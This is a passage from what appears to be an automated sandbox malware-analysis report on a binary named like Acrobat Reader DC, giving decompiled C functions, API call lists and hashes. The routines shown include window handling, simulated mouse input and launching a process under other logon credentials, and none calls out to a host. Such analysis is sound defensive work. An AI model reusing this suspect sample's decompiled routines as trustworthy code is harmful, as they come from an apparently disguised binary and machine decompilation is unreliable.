						if(_t66[1] == _a8 && _t66[0x22] != 0xb) {
							_t80 = _t66[0x22];
							if((_t80 & 0x000000ff) ==  *(_t72 + 0x194) ||  *((char*)(_t72 + 0x19c)) != 0 && _t80 != 0xff && _t66[0x22] != 0xa) {
								ShowWindow( *_t66, 0);
								_t69 =  *( *( *((intOrPtr*)(_t92 + 0x74)) + _t91 * 4));
								if((_t69[0x22] & 0x00000040) != 0 && _t69[0x22] == 0x1a) {
									EnableWindow( *_t69, 0);
								}
							}
						}
					}
					_t91 = _t91 + 1;
				} while (_t91 <=  *((intOrPtr*)(_t92 + 0x84)));
				goto L13;
			}














                                  0x00440a11
                                  0x00440a1e
                                  0x00440a22
                                  0x00440a28
                                  0x00440ac7
                                  0x00440ac7
                                  0x00440ad2
                                  0x00440b63
                                  0x00440b7f
                                  0x00440ad8
                                  0x00440add
                                  0x00440ae0
                                  0x00440ae6
                                  0x00440ae8
                                  0x00440af0
                                  0x00440b18
                                  0x00440b2b
                                  0x00440b37
                                  0x00440b40
                                  0x00440b50
                                  0x00440b50
                                  0x00440b40
                                  0x00440af0
                                  0x00440b56
                                  0x00440b57
                                  0x00000000
                                  0x00440add
                                  0x00440ad2
                                  0x00440a2e
                                  0x00440a39
                                  0x00440abe
                                  0x00440ac1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00440a3f
                                  0x00440a3f
                                  0x00440a42
                                  0x00440a48
                                  0x00440a4a
                                  0x00440a52
                                  0x00440a5d
                                  0x00440a6c
                                  0x00440a8a
                                  0x00440a96
                                  0x00440a9f
                                  0x00440aaf
                                  0x00440aaf
                                  0x00440a9f
                                  0x00440a6c
                                  0x00440a52
                                  0x00440ab5
                                  0x00440ab6
                                  0x00000000

                                  APIs
                                  • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                  • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                  • ShowWindow.USER32(?,00000000), ref: 00440B18
                                  • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                  • EnableWindow.USER32(?,00000001), ref: 00440B50
                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$Show$Enable$MessageSend
                                  • String ID:
                                  • API String ID: 642888154-0
                                  • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                  • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                  • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                  • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00441FD6 Relevance: 9.1, APIs: 6, Instructions: 102COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 65%
                                  			E00441FD6(void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v32;
				char _v36;
				long _v40;
				long _v44;
				intOrPtr _v48;
				signed int _t59;
				long _t68;
				long _t72;
				long _t91;
				long _t96;
				signed int _t98;
				void* _t100;
				void* _t101;

				_t105 = __fp0;
				_t100 = (_t98 & 0xfffffff8) - 0x2c;
				_t72 = _a16;
				E0043137E( *((intOrPtr*)(_a4 + 0x100)),  &_v36, GetForegroundWindow());
				GetWindowRect(GetDesktopWindow(),  &_v32);
				asm("cdq");
				_t96 = (_a8 + _v48 + 1 << 0x10) / _v32.right - 1;
				asm("cdq");
				_t59 = (_a12 + _v44 + 1 << 0x10) / _v32.bottom;
				_t91 = _t59 - 1;
				if(_t72 != 0) {
					if(__eflags <= 0) {
						L6:
						_t72 = 0xa;
						L7:
						GetCursorPos( &(_v32.top));
						asm("cdq");
						_v40 = _v32.top.x * 0xffff / (_v12 - 1) + 1;
						asm("cdq");
						_t68 = _v32.right * 0xffff / (_v8 - 1) + 1;
						__eflags = _t68;
						_v44 = _t68;
						while(1) {
							_t59 = E0043326F(_t96, _t91, _t72, 0x20,  &_v40,  &_v44);
							_t101 = _t100 + 0x18;
							__eflags = _t59;
							if(_t59 == 0) {
								break;
							}
							mouse_event(0x8001, _v40, _v44, 0, 0);
							_push(0xa);
							E004331A2(_t59, _t105);
							_t100 = _t101 + 4;
						}
						L3:
						return _t59;
					}
					__eflags = _t72 - 0x64;
					if(_t72 <= 0x64) {
						goto L7;
					}
					goto L6;
				}
				mouse_event(0x8001, _t96, _t91, _t72, _t72);
				if(_a20 != _t72) {
					_push(0xa);
					_t59 = E004331A2(_t59, __fp0);
				}
				goto L3;
			}


















                                  0x00441fd6
                                  0x00441fdc
                                  0x00441fe0
                                  0x00442001
                                  0x0044201a
                                  0x00442026
                                  0x0044202b
                                  0x00442034
                                  0x00442035
                                  0x00442039
                                  0x0044203e
                                  0x00442067
                                  0x0044206e
                                  0x0044206e
                                  0x00442073
                                  0x00442078
                                  0x0044208c
                                  0x0044209a
                                  0x004420a8
                                  0x004420ab
                                  0x004420ab
                                  0x004420ac
                                  0x004420b6
                                  0x004420c5
                                  0x004420ca
                                  0x004420cd
                                  0x004420cf
                                  0x00000000
                                  0x00000000
                                  0x004420e4
                                  0x004420ea
                                  0x004420ec
                                  0x004420f1
                                  0x004420f1
                                  0x0044205e
                                  0x00442064
                                  0x00442064
                                  0x00442069
                                  0x0044206c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044206c
                                  0x00442049
                                  0x00442052
                                  0x00442054
                                  0x00442056
                                  0x0044205b
                                  0x00000000

                                  APIs
                                  • GetForegroundWindow.USER32 ref: 00441FEB
                                    • Part of subcall function 0043137E: GetWindowRect.USER32 ref: 00431399
                                  • GetDesktopWindow.USER32 ref: 00442013
                                  • GetWindowRect.USER32 ref: 0044201A
                                  • mouse_event.USER32 ref: 00442049
                                    • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                  • GetCursorPos.USER32(?,?,?), ref: 00442078
                                  • mouse_event.USER32 ref: 004420E4
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                  • String ID:
                                  • API String ID: 4137160315-0
                                  • Opcode ID: c5ebc6bffcea8891df72ff2766fe98ff5e780c8f2d9f97d85ba0139f445d3039
                                  • Instruction ID: 269498413448c1b0457bf7b9883effbdcf17ebc276120b60b0d95eb2daedcabf
                                  • Opcode Fuzzy Hash: c5ebc6bffcea8891df72ff2766fe98ff5e780c8f2d9f97d85ba0139f445d3039
                                  • Instruction Fuzzy Hash: FA31A372104306AFE710CF54CD85E6BB7E9FF98304F00092DF94597281E6B5EA05CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E00441078(void* __ebx, void* __esi, long _a4, long _a8, signed int _a12) {
				signed int _t18;
				long _t21;
				signed int _t24;
				void* _t32;
				struct HWND__** _t33;
				intOrPtr _t36;
				long _t40;
				void* _t42;
				struct HWND__* _t43;

				_t42 = __esi;
				_t32 = __ebx;
				_t17 = _a12;
				_t40 = _a4;
				if(_a12 == 0) {
					_t18 =  *0x4a869c; // 0xffffffff
				} else {
					_t18 = E00430C09(_t17, 0x4a8630, _t17);
					 *0x4a869c = _t18;
				}
				if(_t18 != 0xffffffff) {
					_t36 =  *0x4a8690; // 0x0
					_push(_t32);
					_t33 =  *( *(_t36 + _t18 * 4));
					_push(_t42);
					_t43 =  *_t33;
					_a12 = 0 | (GetWindowLongW(_t43, 0xfffffff0) & 0x00c00000) == 0x00c00000;
					if(_t40 == 0xffffffff || SetWindowLongW(_t43, 0xfffffff0, _t40) != 0) {
						_t21 = _a8;
						if(_t21 == 0xffffffff || SetWindowLongW(_t43, 0xffffffec, _t21) != 0) {
							if(_t33[0xe] != 0) {
								_t24 = 0 | (_t40 & 0x00c00000) == 0x00c00000;
								if(_a12 != _t24) {
									_push(4);
									if(_t24 == 0) {
										_t33[0x12] = _t33[0x12] - GetSystemMetrics();
									} else {
										_t33[0x12] = _t33[0x12] + GetSystemMetrics();
									}
								}
								SetWindowPos(_t43, 0, 0, 0, 0, 0, 0x47);
							}
							return 1;
						} else {
							goto L6;
						}
					} else {
						L6:
						return 0;
					}
				} else {
					return 0;
				}
			}












                                  0x00441078
                                  0x00441078
                                  0x0044107b
                                  0x0044107f
                                  0x00441084
                                  0x00441150
                                  0x0044108a
                                  0x00441090
                                  0x00441095
                                  0x00441095
                                  0x00441158
                                  0x0044109f
                                  0x004410a8
                                  0x004410a9
                                  0x004410ab
                                  0x004410ac
                                  0x004410c6
                                  0x004410cc
                                  0x004410dc
                                  0x004410e2
                                  0x004410ff
                                  0x0044110f
                                  0x00441115
                                  0x00441117
                                  0x0044111b
                                  0x0044112e
                                  0x0044111d
                                  0x00441123
                                  0x00441123
                                  0x0044111b
                                  0x0044113e
                                  0x0044113e
                                  0x0044114d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004410f2
                                  0x004410f2
                                  0x004410f8
                                  0x004410f8
                                  0x0044115e
                                  0x00441162
                                  0x00441162

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                  • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                  • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                  • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044389A(void* __ecx, void* __eflags, struct HDC__* _a4, intOrPtr _a8, signed int _a12) {
				long _v12;
				char _v20;
				void* __edi;
				void* _t23;
				int _t29;
				long _t31;
				void* _t33;
				signed int _t34;
				void* _t35;
				char _t39;
				WCHAR* _t40;
				struct tagSIZE* _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;

				_t46 = __eflags;
				_t35 = __ecx;
				_t41 = _a12;
				E0043652F(_t46,  &_v20, E00410160(_a8, __eflags));
				_t39 = _v20;
				_t34 = 0;
				_t41->cy = 0;
				_t41->cx = 0;
				_v12 = 0;
				_a12 = 1;
				_t23 = E004111C1(_t39);
				_t43 = _t42 + 4;
				if(_t23 != 0) {
					do {
						if( *((short*)(_t39 + _t34 * 2)) == 0xa) {
							_a12 = _a12 + 1;
						}
						_t34 = _t34 + 1;
						_t33 = E004111C1(_t39);
						_t43 = _t43 + 4;
						_t50 = _t34 - _t33;
					} while (_t34 < _t33);
				}
				_t40 = E00413EB8(_t35, _t50, _t39, L"\r\n");
				_t44 = _t43 + 8;
				while(_t40 != 0) {
					_t29 = E004111C1(_t40);
					_t36 = _a4;
					_t45 = _t44 + 4;
					GetTextExtentPoint32W(_a4, _t40, _t29, _t41);
					_t31 = _t41->cx;
					_t52 = _t31 - _v12;
					if(_t31 > _v12) {
						_v12 = _t31;
					}
					_t40 = E00413EB8(_t36, _t52, 0, L"\r\n");
					_t44 = _t45 + 8;
				}
				_t41->cy = _t41->cy * _a12;
				_t41->cx = _v12;
				return E00436508( &_v20);
			}



















                                  0x0044389a
                                  0x0044389a
                                  0x004438a2
                                  0x004438b3
                                  0x004438b8
                                  0x004438bb
                                  0x004438be
                                  0x004438c1
                                  0x004438c3
                                  0x004438c6
                                  0x004438cd
                                  0x004438d2
                                  0x004438d7
                                  0x004438da
                                  0x004438df
                                  0x004438e1
                                  0x004438e1
                                  0x004438e5
                                  0x004438e6
                                  0x004438eb
                                  0x004438ee
                                  0x004438ee
                                  0x004438da
                                  0x004438fd
                                  0x004438ff
                                  0x00443904
                                  0x0044390c
                                  0x00443911
                                  0x00443914
                                  0x0044391a
                                  0x00443920
                                  0x00443922
                                  0x00443925
                                  0x00443927
                                  0x00443927
                                  0x00443936
                                  0x00443938
                                  0x0044393b
                                  0x00443949
                                  0x00443950
                                  0x0044395d

                                  APIs
                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                  • _wcslen.LIBCMT ref: 004438CD
                                  • _wcslen.LIBCMT ref: 004438E6
                                  • _wcstok.LIBCMT ref: 004438F8
                                  • _wcslen.LIBCMT ref: 0044390C
                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                  • _wcstok.LIBCMT ref: 00443931
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                  • String ID:
                                  • API String ID: 3632110297-0
                                  • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                  • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                  • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                  • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00436E94 Relevance: 9.1, APIs: 6, Instructions: 75processCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E00436E94(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, intOrPtr _a20, void* _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				int _v8;
				signed char _t29;
				intOrPtr _t31;
				intOrPtr _t32;
				int _t36;
				signed int _t40;
				void* _t53;
				signed int _t56;

				_t29 = _a16;
				_t56 = _a24;
				_t53 = 0;
				_a16 = 0;
				if((_t29 & 0x00000001) == 0) {
					if((_t29 & 0x00000002) != 0) {
						_t53 = 2;
					}
				} else {
					_t53 = 1;
				}
				_t40 = 0;
				if((_t29 & 0x00000004) == 0) {
					L6:
					_t31 = _a12;
					__imp__CreateProcessWithLogonW(_a4, _a8, _t31, _t53, 0, _a20, _t56 | 0x00000400, _a16, _a28, _a32, _a36);
					_t40 = _t40 & 0xffffff00 | _t31 != 0x00000000;
					goto L7;
				} else {
					_a24 = 0;
					_t36 = OpenProcessToken(GetCurrentProcess(), 0xa,  &_a24);
					__imp__CreateEnvironmentBlock( &_a16, _a24, 1);
					_v8 = _t36;
					CloseHandle(_a24);
					if(_v8 == 0) {
						L7:
						_t32 = _a16;
						if(_t32 != 0) {
							__imp__DestroyEnvironmentBlock(_t32);
						}
						return _t40;
					}
					goto L6;
				}
			}











                                  0x00436e98
                                  0x00436e9d
                                  0x00436ea3
                                  0x00436ea5
                                  0x00436eaa
                                  0x00436eb3
                                  0x00436eb5
                                  0x00436eb5
                                  0x00436eac
                                  0x00436eac
                                  0x00436eac
                                  0x00436eba
                                  0x00436ebe
                                  0x00436ef9
                                  0x00436f0b
                                  0x00436f23
                                  0x00436f2b
                                  0x00000000
                                  0x00436ec0
                                  0x00436ec6
                                  0x00436ed0
                                  0x00436ee0
                                  0x00436ee6
                                  0x00436eed
                                  0x00436ef7
                                  0x00436f2e
                                  0x00436f2e
                                  0x00436f33
                                  0x00436f36
                                  0x00436f36
                                  0x00436f44
                                  0x00436f44
                                  0x00000000
                                  0x00436ef7

                                  APIs
                                  • GetCurrentProcess.KERNEL32(0000000A,?), ref: 00436EC9
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00436ED0
                                  • CreateEnvironmentBlock.USERENV(?,?,00000001), ref: 00436EE0
                                  • CloseHandle.KERNEL32(?), ref: 00436EED
                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 00436F23
                                  • DestroyEnvironmentBlock.USERENV(?), ref: 00436F36
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                  • String ID:
                                  • API String ID: 1413079979-0
                                  • Opcode ID: c9cc6947404163de0e4cba86d071e92e41844a234d0bab68a120be017310f46c
                                  • Instruction ID: dd31e3d5ef53dadf09d6f4902918c4fef8fb0ebcc20249036383472598af8dfc
                                  • Opcode Fuzzy Hash: c9cc6947404163de0e4cba86d071e92e41844a234d0bab68a120be017310f46c
                                  • Instruction Fuzzy Hash: 10214C7620020AABDB14CF69DD59EEB37ADEB8D310F15851AFD05A3250C775EC12CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 70%
                                  			E004331A2(int __eax, signed long long __fp0, long _a4, signed short _a6) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				union _LARGE_INTEGER _v20;
				union _LARGE_INTEGER _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				union _LARGE_INTEGER _v44;
				signed int _t20;
				long _t26;
				long _t27;
				signed long long _t28;

				_t28 = __fp0;
				_t13 = __eax;
				_t26 = _a4;
				_t27 = _t26;
				if(_t27 < 0) {
					return __eax;
				} else {
					if(_t27 != 0) {
						if(_t26 >= 0xf) {
							L8:
							Sleep(_t26);
							return _t13;
						}
						_t13 = QueryPerformanceCounter( &_v28);
						if(_t13 == 0) {
							goto L8;
						}
						QueryPerformanceFrequency( &_v44);
						do {
							Sleep(0);
							QueryPerformanceCounter( &_v20);
							asm("fnstcw word [ebp+0xa]");
							asm("sbb ecx, [ebp-0x14]");
							_v36 = _v20.LowPart - _v28.LowPart;
							_v32 = _v16;
							asm("fild qword [ebp-0x20]");
							asm("fild qword [ebp-0x28]");
							_t20 = _a6 & 0x0000ffff | 0x00000c00;
							_v8 = _t20;
							asm("fdivp st1, st0");
							_t28 = _t28 *  *0x48cd40;
							asm("fldcw word [ebp-0x4]");
							asm("fistp qword [ebp-0x8]");
							asm("fldcw word [ebp+0xa]");
						} while (_v12 < _t26);
						return _t20;
					} else {
						Sleep(0);
						return _t13;
					}
				}
			}















                                  0x004331a2
                                  0x004331a2
                                  0x004331a9
                                  0x004331ad
                                  0x004331af
                                  0x00433243
                                  0x004331b5
                                  0x004331b5
                                  0x004331c8
                                  0x00433237
                                  0x00433238
                                  0x00000000
                                  0x00433238
                                  0x004331d4
                                  0x004331d8
                                  0x00000000
                                  0x00000000
                                  0x004331de
                                  0x004331e4
                                  0x004331e6
                                  0x004331f0
                                  0x004331f2
                                  0x004331fe
                                  0x00433201
                                  0x00433204
                                  0x00433207
                                  0x0043320e
                                  0x00433211
                                  0x00433216
                                  0x00433219
                                  0x0043321b
                                  0x00433221
                                  0x00433224
                                  0x0043322a
                                  0x0043322d
                                  0x00433236
                                  0x004331b7
                                  0x004331b9
                                  0x004331c4
                                  0x004331c4
                                  0x004331b5

                                  APIs
                                  • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                  • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                  • String ID:
                                  • API String ID: 2833360925-0
                                  • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                  • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                  • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                  • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00447275(struct HDC__* _a4, int _a8, int _a12, signed char _a16) {
				void* _t10;
				int _t19;
				int _t22;
				struct HDC__* _t24;

				_t19 = _a8;
				_t24 = _a4;
				_t22 = _a12;
				if((_a16 & 0x00000001) != 0) {
					E0044719B(_t24, 0, 0xffffffff, 0, 1);
					MoveToEx(_t24, _t19 - 2, _t22, 0);
					LineTo(_t24, _t19 + 3, _t22);
					MoveToEx(_t24, _t19, _t22 - 2, 0);
					LineTo(_t24, _t19, _t22 + 3);
					if( *0x4a86ec != 0) {
						EndPath(_t24);
						 *0x4a86ec = 0;
					}
					return StrokePath(_t24);
				}
				return _t10;
			}







                                  0x0044727d
                                  0x00447281
                                  0x00447285
                                  0x00447288
                                  0x00447293
                                  0x004472a0
                                  0x004472ac
                                  0x004472ba
                                  0x004472c6
                                  0x004472d3
                                  0x004472d6
                                  0x004472dc
                                  0x004472dc
                                  0x00000000
                                  0x004472e4
                                  0x004472ee

                                  APIs
                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                  • LineTo.GDI32(?,?,?), ref: 004472AC
                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                  • LineTo.GDI32(?,?,?), ref: 004472C6
                                  • EndPath.GDI32(?), ref: 004472D6
                                  • StrokePath.GDI32(?), ref: 004472E4
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                  • String ID:
                                  • API String ID: 372113273-0
                                  • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
